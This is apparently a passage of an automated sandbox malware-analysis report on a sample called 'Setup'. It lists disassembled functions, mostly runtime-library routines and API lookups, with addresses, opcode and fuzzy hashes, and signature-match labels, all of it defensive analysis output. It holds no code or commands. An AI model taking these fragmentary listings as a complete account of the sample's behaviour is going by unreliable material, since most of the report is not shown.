                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3moneypunct
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3160146232-0
                                                                                                                                                                                                                                                      • Opcode ID: b3a4839c0251b73f9c28f1cf63f9e1e194ad0f70ce308f8a78b9cf7ead9a99e6
                                                                                                                                                                                                                                                      • Instruction ID: 5f9de1ec234424ce16d36e89769f23b51979cbd7f36d97395fb6328e405744f8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3a4839c0251b73f9c28f1cf63f9e1e194ad0f70ce308f8a78b9cf7ead9a99e6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 97F05E319002599BCF01EB90C9257FE666AEF54304F514019E9096B390CB749E058FA5
                                                                                                                                                                                                                                                      Function 031AB850 Relevance: 6.0, APIs: 4, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(031EE1A0), ref: 031AB856
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,031EE1BC), ref: 031AB864
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,031EE1D0), ref: 031AB875
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,031EE1F0), ref: 031AB886
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 667068680-0
                                                                                                                                                                                                                                                      • Opcode ID: f86f60b722787da3d57dfda8f806bd712d2f1e7e9bca2e7a26565e860fbf8a5b
                                                                                                                                                                                                                                                      • Instruction ID: f0b5b45bc1d83f1fce75455452a9ec5794e01373b7a7f51fcb09bd38a1b72d4b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f86f60b722787da3d57dfda8f806bd712d2f1e7e9bca2e7a26565e860fbf8a5b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2E0B679546720AFC704FFB0BC0D89A7AA4AA0EA13310491AF856D651FE77604C4CBF0
                                                                                                                                                                                                                                                      Function 031A6680 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 328COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031A6956
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031A6985
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                      • String ID: .!
                                                                                                                                                                                                                                                      • API String ID: 593203224-2740948462
                                                                                                                                                                                                                                                      • Opcode ID: 4f06defc501714ba3001036c1e4a4c8468eb448708de89a75333c65c87c583ef
                                                                                                                                                                                                                                                      • Instruction ID: 2c4b2db6dd7828456dd09c5152d776195a705a31a4f1bc113c31d461ad750a77
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f06defc501714ba3001036c1e4a4c8468eb448708de89a75333c65c87c583ef
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7D1ACB5E00619DFCB04DFA8C984BAEBBB5FF4C305F184119D816AB390DB75AA45CB90
                                                                                                                                                                                                                                                      Function 031C9355 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 291COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __aulldiv
                                                                                                                                                                                                                                                      • String ID: +$-
                                                                                                                                                                                                                                                      • API String ID: 3732870572-2137968064
                                                                                                                                                                                                                                                      • Opcode ID: 7d86644e1283cfaa69a9a237bde454d26c6d8be59227446baf86fc9dd63f69b2
                                                                                                                                                                                                                                                      • Instruction ID: 29c149c133fd6b5cb9352b7f09377004030a0991c016abcd42a6431070ff47be
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d86644e1283cfaa69a9a237bde454d26c6d8be59227446baf86fc9dd63f69b2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D4A1A471A202D8AFDF14CE78C8506EE7BA5EF6E324F09859ED8659B381D334D541CB50
                                                                                                                                                                                                                                                      Function 031BEB7E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 184COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __aulldiv
                                                                                                                                                                                                                                                      • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                                                                                                                                                                                                      • API String ID: 3732870572-1956417402
                                                                                                                                                                                                                                                      • Opcode ID: 5cf1723a15e83c1daaa3b99d957fc1918f1815d82b253164d621b4d209876b09
                                                                                                                                                                                                                                                      • Instruction ID: 50b14dd1f6ad882f7d71e2ac6726edad8e8b5f57928586586d61851a5cfd9ec9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5cf1723a15e83c1daaa3b99d957fc1918f1815d82b253164d621b4d209876b09
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F51C370A04299AFDF25CEADE8907FEFBF9AF4D250F0848AAD485D7240D37495818B71
                                                                                                                                                                                                                                                      Function 0319DC80 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 0319DDE0
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID: false$true
                                                                                                                                                                                                                                                      • API String ID: 118556049-2658103896
                                                                                                                                                                                                                                                      • Opcode ID: 6d83b2f796fa8e99d2ee99c00c1b442f24bed3d8c7a7b1af731a6c2e4a116332
                                                                                                                                                                                                                                                      • Instruction ID: 2570f5f45967b2190cc0421400afabc0749fb4baa30f52aad0f3377df176a2ae
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d83b2f796fa8e99d2ee99c00c1b442f24bed3d8c7a7b1af731a6c2e4a116332
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 285159359043949FDF20CF28D90076ABBFAEB8D210F0881AED8655B385C7769905CBA0
                                                                                                                                                                                                                                                      Function 02D4F464 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D4F5C4
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID: 0vH$8vH
                                                                                                                                                                                                                                                      • API String ID: 118556049-2226986219
                                                                                                                                                                                                                                                      • Opcode ID: ff33dc7922dc2eddd473bd00180b6ac851c50391568b80d18f8cfdcbe3271453
                                                                                                                                                                                                                                                      • Instruction ID: 3b4100f755e17671a1a5617747b9347b5a77f2a22b07509021d797c8cce54a10
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff33dc7922dc2eddd473bd00180b6ac851c50391568b80d18f8cfdcbe3271453
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 61510531D042509FCB21CF68C8407AABBB6EB45314F1882AED8555B795EB7ADD05CBA0
                                                                                                                                                                                                                                                      Function 0319DAF0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 0319DC7A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID: false$true
                                                                                                                                                                                                                                                      • API String ID: 118556049-2658103896
                                                                                                                                                                                                                                                      • Opcode ID: 28a8272e1b9fd78f960a2c886ceca6bb3b532b6b51628584c6d84c85f0dd9285
                                                                                                                                                                                                                                                      • Instruction ID: 937e30066fbb2bf41c8715e42f66ee75b2a4681e760a885789e7132b1674b142
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 28a8272e1b9fd78f960a2c886ceca6bb3b532b6b51628584c6d84c85f0dd9285
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5441F4759042858FDF10CF68C54039ABFB6AB9E314F18819ED8556B385C3B69A05CBA1
                                                                                                                                                                                                                                                      Function 02D4F2D4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D4F45E
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID: 0vH$8vH
                                                                                                                                                                                                                                                      • API String ID: 118556049-2226986219
                                                                                                                                                                                                                                                      • Opcode ID: 413783ce1d8b7bf010adf0d91d9b194f15894087087c851485b2c2ae9e3811e4
                                                                                                                                                                                                                                                      • Instruction ID: d2557aed8f1602c0efaa0682b31bb1eeb68923409c0d9edf68abecc22a476abf
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 413783ce1d8b7bf010adf0d91d9b194f15894087087c851485b2c2ae9e3811e4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C41F531E042418FCF11CF68C94439ABFB1EF46314F18C1AEC8985B346DBBA9A05CBA1
                                                                                                                                                                                                                                                      Function 031BF870 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 031BF8AF
                                                                                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 031BF963
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                                                                      • API String ID: 3480331319-1018135373
                                                                                                                                                                                                                                                      • Opcode ID: b5de8cfd31869bb94bd71ec20f617ea7f6dd7a880dd770da998fdca201e54b43
                                                                                                                                                                                                                                                      • Instruction ID: 5b4aff74daa9999ee45363ff8a2f2db81f8a8ff461755bd96bba1d01e3915e98
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b5de8cfd31869bb94bd71ec20f617ea7f6dd7a880dd770da998fdca201e54b43
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B419034A00208ABCF14DF69CC94ADEBBB5AF4D324F188159E814AF391D731EA56CF91
                                                                                                                                                                                                                                                      Function 02D71054 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 02D71093
                                                                                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 02D71147
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                                                                      • API String ID: 3480331319-1018135373
                                                                                                                                                                                                                                                      • Opcode ID: dc4570d85e6018797a7426dc425d82f38a4a302b79d62b8f7d776e071b001b23
                                                                                                                                                                                                                                                      • Instruction ID: 08d04d3f9980a2cadf4b6f1ac3c76c9d7caaee985fed35f43d3596b953161ce7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc4570d85e6018797a7426dc425d82f38a4a302b79d62b8f7d776e071b001b23
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E0419234A002499BCF10DF69C884A9EBBB5EF45314F1482A5EC1CAB351E739DE15CFA1
                                                                                                                                                                                                                                                      Function 02D739A1 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Catch
                                                                                                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                                                                                                      • API String ID: 78271584-2084237596
                                                                                                                                                                                                                                                      • Opcode ID: 5b0177aa4fcb61b795d5e31654247f54bf0e3a295920037b57f5144041711d77
                                                                                                                                                                                                                                                      • Instruction ID: ce7ca6639606eee4c1582a3fe8e24778fad7bc2f0e92267a9952bc555427d675
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b0177aa4fcb61b795d5e31654247f54bf0e3a295920037b57f5144041711d77
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 97413771900209AFCF16DF98C982AEEBBB6FF48304F188099E904A7250E339DD50EF51